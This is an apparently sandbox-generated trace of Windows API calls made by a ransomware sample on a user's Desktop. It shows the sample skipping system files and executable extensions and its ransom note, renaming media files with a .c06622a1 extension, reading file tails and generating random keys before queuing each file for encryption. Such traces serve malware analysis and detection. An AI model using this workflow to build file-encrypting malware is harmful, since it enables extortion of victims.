[0156.198] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0156.198] wcslen (_String="bin") returned 0x3 [0156.198] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0156.198] wcslen (_String="cab") returned 0x3 [0156.198] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0156.198] wcslen (_String="cmd") returned 0x3 [0156.198] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0156.198] wcslen (_String="com") returned 0x3 [0156.198] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0156.198] wcslen (_String="cpl") returned 0x3 [0156.199] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0156.199] wcslen (_String="cur") returned 0x3 [0156.199] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0156.199] wcslen (_String="deskthemepack") returned 0xd [0156.199] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0156.199] wcslen (_String="diagcab") returned 0x7 [0156.199] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0156.199] wcslen (_String="diagcfg") returned 0x7 [0156.199] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0156.199] wcslen (_String="diagpkg") returned 0x7 [0156.199] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0156.199] wcslen (_String="dll") returned 0x3 [0156.199] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0156.199] wcslen (_String="drv") returned 0x3 [0156.199] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0156.199] wcslen (_String="exe") returned 0x3 [0156.199] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0156.199] wcslen (_String="hlp") returned 0x3 [0156.199] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0156.199] wcslen (_String="icl") returned 0x3 [0156.199] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0156.199] wcslen (_String="icns") returned 0x4 [0156.199] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0156.199] wcslen (_String="ico") returned 0x3 [0156.199] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0156.199] wcslen (_String="ics") returned 0x3 [0156.199] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0156.199] wcslen (_String="idx") returned 0x3 [0156.199] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0156.199] wcslen (_String="ldf") returned 0x3 [0156.199] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0156.199] wcslen (_String="lnk") returned 0x3 [0156.200] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0156.200] wcslen (_String="mod") returned 0x3 [0156.200] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0156.200] wcslen (_String="mpa") returned 0x3 [0156.200] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0156.200] wcslen (_String="msc") returned 0x3 [0156.200] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0156.200] wcslen (_String="msp") returned 0x3 [0156.200] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0156.200] wcslen (_String="msstyles") returned 0x8 [0156.200] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0156.200] wcslen (_String="msu") returned 0x3 [0156.200] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0156.200] wcslen (_String="nls") returned 0x3 [0156.200] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0156.200] wcslen (_String="nomedia") returned 0x7 [0156.200] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0156.201] wcslen (_String="ocx") returned 0x3 [0156.201] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0156.201] wcslen (_String="prf") returned 0x3 [0156.201] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0156.201] wcslen (_String="ps1") returned 0x3 [0156.201] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0156.201] wcslen (_String="rom") returned 0x3 [0156.201] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0156.201] wcslen (_String="rtp") returned 0x3 [0156.201] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0156.201] wcslen (_String="scr") returned 0x3 [0156.201] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0156.201] wcslen (_String="shs") returned 0x3 [0156.201] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0156.201] wcslen (_String="spl") returned 0x3 [0156.201] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0156.201] wcslen (_String="sys") returned 0x3 [0156.202] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0156.202] wcslen (_String="theme") returned 0x5 [0156.202] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0156.202] wcslen (_String="themepack") returned 0x9 [0156.202] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0156.202] wcslen (_String="wpx") returned 0x3 [0156.202] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0156.202] wcslen (_String="lock") returned 0x4 [0156.202] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0156.202] wcslen (_String="key") returned 0x3 [0156.202] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0156.202] wcslen (_String="hta") returned 0x3 [0156.202] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0156.202] wcslen (_String="msi") returned 0x3 [0156.202] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0156.203] wcslen (_String="pdb") returned 0x3 [0156.203] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0156.203] wcslen (_String="sqlite") returned 0x6 [0156.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.203] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.203] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.203] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.203] wcscpy (in: _Dest=0x208e74, _Source="sL3sOSs.wav" | out: _Dest="sL3sOSs.wav") returned="sL3sOSs.wav" [0156.203] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sL3sOSs.wav", dwFileAttributes=0x80) returned 1 [0156.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sL3sOSs.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sl3soss.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0156.203] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.204] ReadFile (in: hFile=0x19c, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.204] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x68446db7 [0156.204] RtlComputeCrc32 (PartialCrc=0x6db7, Buffer=0x32ec24, Length=0x80) returned 0x5534bb0 [0156.204] RtlComputeCrc32 (PartialCrc=0x4bb0, Buffer=0x32ec24, Length=0x80) returned 0x4368daf7 [0156.204] RtlComputeCrc32 (PartialCrc=0xdaf7, Buffer=0x32ec24, Length=0x80) returned 0x91f96662 [0156.204] RtlComputeCrc32 (PartialCrc=0x6662, Buffer=0x32ec24, Length=0x80) returned 0x1657aab1 [0156.204] CloseHandle (hObject=0x19c) returned 1 [0156.205] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.205] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sL3sOSs.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sL3sOSs.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sL3sOSs.wav" [0156.205] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sL3sOSs.wav") returned 0x35 [0156.205] wcscpy (in: _Dest=0x218e92, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.205] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sL3sOSs.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sl3soss.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sL3sOSs.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sl3soss.wav.c06622a1"), dwFlags=0x8) returned 1 [0156.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sL3sOSs.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sl3soss.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0156.207] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.207] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x37e0020 [0156.215] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5df3d740 [0156.215] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x665092de [0156.215] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x766ee512 [0156.215] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x79c14fb9 [0156.215] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5bbb60dd [0156.215] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7da932e9 [0156.215] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a0592e2 [0156.215] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x25727407 [0156.218] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x37e0094, Length=0x80) returned 0x7b391b01 [0156.218] RtlComputeCrc32 (PartialCrc=0x1b01, Buffer=0x37e0094, Length=0x80) returned 0x7bd41feb [0156.218] RtlComputeCrc32 (PartialCrc=0x1feb, Buffer=0x37e0094, Length=0x80) returned 0xf6b5debd [0156.218] RtlComputeCrc32 (PartialCrc=0xdebd, Buffer=0x37e0094, Length=0x80) returned 0xe5b9d993 [0156.218] RtlComputeCrc32 (PartialCrc=0xd993, Buffer=0x37e0094, Length=0x80) returned 0x1576807c [0156.218] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0156.218] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.218] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.218] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c292ff0, ftCreationTime.dwHighDateTime=0x1d5da87, ftLastAccessTime.dwLowDateTime=0xe0993b00, ftLastAccessTime.dwHighDateTime=0x1d5ded0, ftLastWriteTime.dwLowDateTime=0xe0993b00, ftLastWriteTime.dwHighDateTime=0x1d5ded0, nFileSizeHigh=0x0, nFileSizeLow=0xd0f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="StdlUxDRbbDp.mp4", cAlternateFileName="STDLUX~1.MP4")) returned 1 [0156.218] _wcsicmp (_Str1="StdlUxDRbbDp.mp4", _Str2="README.c06622a1.TXT") returned 1 [0156.218] wcsstr (_Str="StdlUxDRbbDp.mp4", _SubStr="README") returned 0x0 [0156.218] _wcsicmp (_Str1="autorun.inf", _Str2="StdlUxDRbbDp.mp4") returned -18 [0156.218] wcslen (_String="autorun.inf") returned 0xb [0156.218] _wcsicmp (_Str1="boot.ini", _Str2="StdlUxDRbbDp.mp4") returned -17 [0156.218] wcslen (_String="boot.ini") returned 0x8 [0156.218] _wcsicmp (_Str1="bootfont.bin", _Str2="StdlUxDRbbDp.mp4") returned -17 [0156.218] wcslen (_String="bootfont.bin") returned 0xc [0156.219] _wcsicmp (_Str1="bootsect.bak", _Str2="StdlUxDRbbDp.mp4") returned -17 [0156.219] wcslen (_String="bootsect.bak") returned 0xc [0156.219] _wcsicmp (_Str1="desktop.ini", _Str2="StdlUxDRbbDp.mp4") returned -15 [0156.219] wcslen (_String="desktop.ini") returned 0xb [0156.219] _wcsicmp (_Str1="iconcache.db", _Str2="StdlUxDRbbDp.mp4") returned -10 [0156.219] wcslen (_String="iconcache.db") returned 0xc [0156.219] _wcsicmp (_Str1="ntldr", _Str2="StdlUxDRbbDp.mp4") returned -5 [0156.219] wcslen (_String="ntldr") returned 0x5 [0156.219] _wcsicmp (_Str1="ntuser.dat", _Str2="StdlUxDRbbDp.mp4") returned -5 [0156.219] wcslen (_String="ntuser.dat") returned 0xa [0156.219] _wcsicmp (_Str1="ntuser.dat.log", _Str2="StdlUxDRbbDp.mp4") returned -5 [0156.219] wcslen (_String="ntuser.dat.log") returned 0xe [0156.219] _wcsicmp (_Str1="ntuser.ini", _Str2="StdlUxDRbbDp.mp4") returned -5 [0156.219] wcslen (_String="ntuser.ini") returned 0xa [0156.219] _wcsicmp (_Str1="thumbs.db", _Str2="StdlUxDRbbDp.mp4") returned 1 [0156.219] wcslen (_String="thumbs.db") returned 0x9 [0156.219] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0156.219] wcslen (_String="386") returned 0x3 [0156.219] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0156.219] wcslen (_String="adv") returned 0x3 [0156.219] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0156.219] wcslen (_String="ani") returned 0x3 [0156.219] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0156.219] wcslen (_String="bat") returned 0x3 [0156.219] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0156.219] wcslen (_String="bin") returned 0x3 [0156.219] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0156.219] wcslen (_String="cab") returned 0x3 [0156.219] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0156.219] wcslen (_String="cmd") returned 0x3 [0156.220] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0156.220] wcslen (_String="com") returned 0x3 [0156.220] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0156.220] wcslen (_String="cpl") returned 0x3 [0156.220] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0156.220] wcslen (_String="cur") returned 0x3 [0156.220] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0156.220] wcslen (_String="deskthemepack") returned 0xd [0156.220] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0156.220] wcslen (_String="diagcab") returned 0x7 [0156.220] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0156.220] wcslen (_String="diagcfg") returned 0x7 [0156.220] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0156.220] wcslen (_String="diagpkg") returned 0x7 [0156.220] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0156.220] wcslen (_String="dll") returned 0x3 [0156.220] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0156.220] wcslen (_String="drv") returned 0x3 [0156.220] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0156.220] wcslen (_String="exe") returned 0x3 [0156.220] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0156.220] wcslen (_String="hlp") returned 0x3 [0156.220] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0156.220] wcslen (_String="icl") returned 0x3 [0156.220] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0156.220] wcslen (_String="icns") returned 0x4 [0156.220] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0156.220] wcslen (_String="ico") returned 0x3 [0156.220] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0156.220] wcslen (_String="ics") returned 0x3 [0156.220] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0156.220] wcslen (_String="idx") returned 0x3 [0156.221] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0156.221] wcslen (_String="ldf") returned 0x3 [0156.221] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0156.221] wcslen (_String="lnk") returned 0x3 [0156.221] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0156.221] wcslen (_String="mod") returned 0x3 [0156.221] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0156.221] wcslen (_String="mpa") returned 0x3 [0156.221] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0156.221] wcslen (_String="msc") returned 0x3 [0156.221] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0156.221] wcslen (_String="msp") returned 0x3 [0156.221] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0156.221] wcslen (_String="msstyles") returned 0x8 [0156.221] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0156.221] wcslen (_String="msu") returned 0x3 [0156.221] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0156.221] wcslen (_String="nls") returned 0x3 [0156.221] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0156.221] wcslen (_String="nomedia") returned 0x7 [0156.221] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0156.221] wcslen (_String="ocx") returned 0x3 [0156.221] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0156.221] wcslen (_String="prf") returned 0x3 [0156.221] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0156.221] wcslen (_String="ps1") returned 0x3 [0156.221] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0156.221] wcslen (_String="rom") returned 0x3 [0156.221] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0156.221] wcslen (_String="rtp") returned 0x3 [0156.221] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0156.221] wcslen (_String="scr") returned 0x3 [0156.222] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0156.222] wcslen (_String="shs") returned 0x3 [0156.222] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0156.222] wcslen (_String="spl") returned 0x3 [0156.222] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0156.222] wcslen (_String="sys") returned 0x3 [0156.222] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0156.222] wcslen (_String="theme") returned 0x5 [0156.222] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0156.222] wcslen (_String="themepack") returned 0x9 [0156.222] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0156.222] wcslen (_String="wpx") returned 0x3 [0156.222] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0156.222] wcslen (_String="lock") returned 0x4 [0156.222] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0156.222] wcslen (_String="key") returned 0x3 [0156.222] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0156.222] wcslen (_String="hta") returned 0x3 [0156.222] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0156.222] wcslen (_String="msi") returned 0x3 [0156.222] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0156.222] wcslen (_String="pdb") returned 0x3 [0156.222] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0156.222] wcslen (_String="sqlite") returned 0x6 [0156.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.222] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.222] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.223] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.223] wcscpy (in: _Dest=0x208e74, _Source="StdlUxDRbbDp.mp4" | out: _Dest="StdlUxDRbbDp.mp4") returned="StdlUxDRbbDp.mp4" [0156.223] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\StdlUxDRbbDp.mp4", dwFileAttributes=0x80) returned 1 [0156.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\StdlUxDRbbDp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\stdluxdrbbdp.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0156.223] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.223] ReadFile (in: hFile=0x1b8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.224] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x49377 [0156.224] RtlComputeCrc32 (PartialCrc=0x9377, Buffer=0x32ec24, Length=0x80) returned 0xa76dc670 [0156.224] RtlComputeCrc32 (PartialCrc=0xc670, Buffer=0x32ec24, Length=0x80) returned 0x368cb77a [0156.224] RtlComputeCrc32 (PartialCrc=0xb77a, Buffer=0x32ec24, Length=0x80) returned 0x55100573 [0156.224] RtlComputeCrc32 (PartialCrc=0x573, Buffer=0x32ec24, Length=0x80) returned 0x659e5f01 [0156.224] CloseHandle (hObject=0x1b8) returned 1 [0156.224] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.224] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\StdlUxDRbbDp.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\StdlUxDRbbDp.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\StdlUxDRbbDp.mp4" [0156.224] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\StdlUxDRbbDp.mp4") returned 0x3a [0156.224] wcscpy (in: _Dest=0x218e9c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.224] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\StdlUxDRbbDp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\stdluxdrbbdp.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\StdlUxDRbbDp.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\stdluxdrbbdp.mp4.c06622a1"), dwFlags=0x8) returned 1 [0156.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\StdlUxDRbbDp.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\stdluxdrbbdp.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0156.227] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.227] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3870020 [0156.234] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x214445 [0156.234] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1a1d7ec8 [0156.234] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29266149 [0156.234] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x265e952a [0156.234] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b16520 [0156.234] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2f80fb76 [0156.234] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x496fd5a6 [0156.234] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c2a7dca [0156.239] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3870094, Length=0x80) returned 0x8601a282 [0156.239] RtlComputeCrc32 (PartialCrc=0xa282, Buffer=0x3870094, Length=0x80) returned 0x9c786d4f [0156.239] RtlComputeCrc32 (PartialCrc=0x6d4f, Buffer=0x3870094, Length=0x80) returned 0x179955c6 [0156.239] RtlComputeCrc32 (PartialCrc=0x55c6, Buffer=0x3870094, Length=0x80) returned 0x2645cc1b [0156.239] RtlComputeCrc32 (PartialCrc=0xcc1b, Buffer=0x3870094, Length=0x80) returned 0x132de874 [0156.239] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0156.239] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.239] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.239] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70332a80, ftCreationTime.dwHighDateTime=0x1d5d9bf, ftLastAccessTime.dwLowDateTime=0x5c628400, ftLastAccessTime.dwHighDateTime=0x1d5e31b, ftLastWriteTime.dwLowDateTime=0x5c628400, ftLastWriteTime.dwHighDateTime=0x1d5e31b, nFileSizeHigh=0x0, nFileSizeLow=0xe999, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYZKIrJgdWjoZp9.gif", cAlternateFileName="SYZKIR~1.GIF")) returned 1 [0156.239] _wcsicmp (_Str1="SYZKIrJgdWjoZp9.gif", _Str2="README.c06622a1.TXT") returned 1 [0156.239] wcsstr (_Str="SYZKIrJgdWjoZp9.gif", _SubStr="README") returned 0x0 [0156.239] _wcsicmp (_Str1="autorun.inf", _Str2="SYZKIrJgdWjoZp9.gif") returned -18 [0156.239] wcslen (_String="autorun.inf") returned 0xb [0156.239] _wcsicmp (_Str1="boot.ini", _Str2="SYZKIrJgdWjoZp9.gif") returned -17 [0156.239] wcslen (_String="boot.ini") returned 0x8 [0156.239] _wcsicmp (_Str1="bootfont.bin", _Str2="SYZKIrJgdWjoZp9.gif") returned -17 [0156.239] wcslen (_String="bootfont.bin") returned 0xc [0156.239] _wcsicmp (_Str1="bootsect.bak", _Str2="SYZKIrJgdWjoZp9.gif") returned -17 [0156.239] wcslen (_String="bootsect.bak") returned 0xc [0156.239] _wcsicmp (_Str1="desktop.ini", _Str2="SYZKIrJgdWjoZp9.gif") returned -15 [0156.239] wcslen (_String="desktop.ini") returned 0xb [0156.239] _wcsicmp (_Str1="iconcache.db", _Str2="SYZKIrJgdWjoZp9.gif") returned -10 [0156.239] wcslen (_String="iconcache.db") returned 0xc [0156.239] _wcsicmp (_Str1="ntldr", _Str2="SYZKIrJgdWjoZp9.gif") returned -5 [0156.239] wcslen (_String="ntldr") returned 0x5 [0156.239] _wcsicmp (_Str1="ntuser.dat", _Str2="SYZKIrJgdWjoZp9.gif") returned -5 [0156.239] wcslen (_String="ntuser.dat") returned 0xa [0156.239] _wcsicmp (_Str1="ntuser.dat.log", _Str2="SYZKIrJgdWjoZp9.gif") returned -5 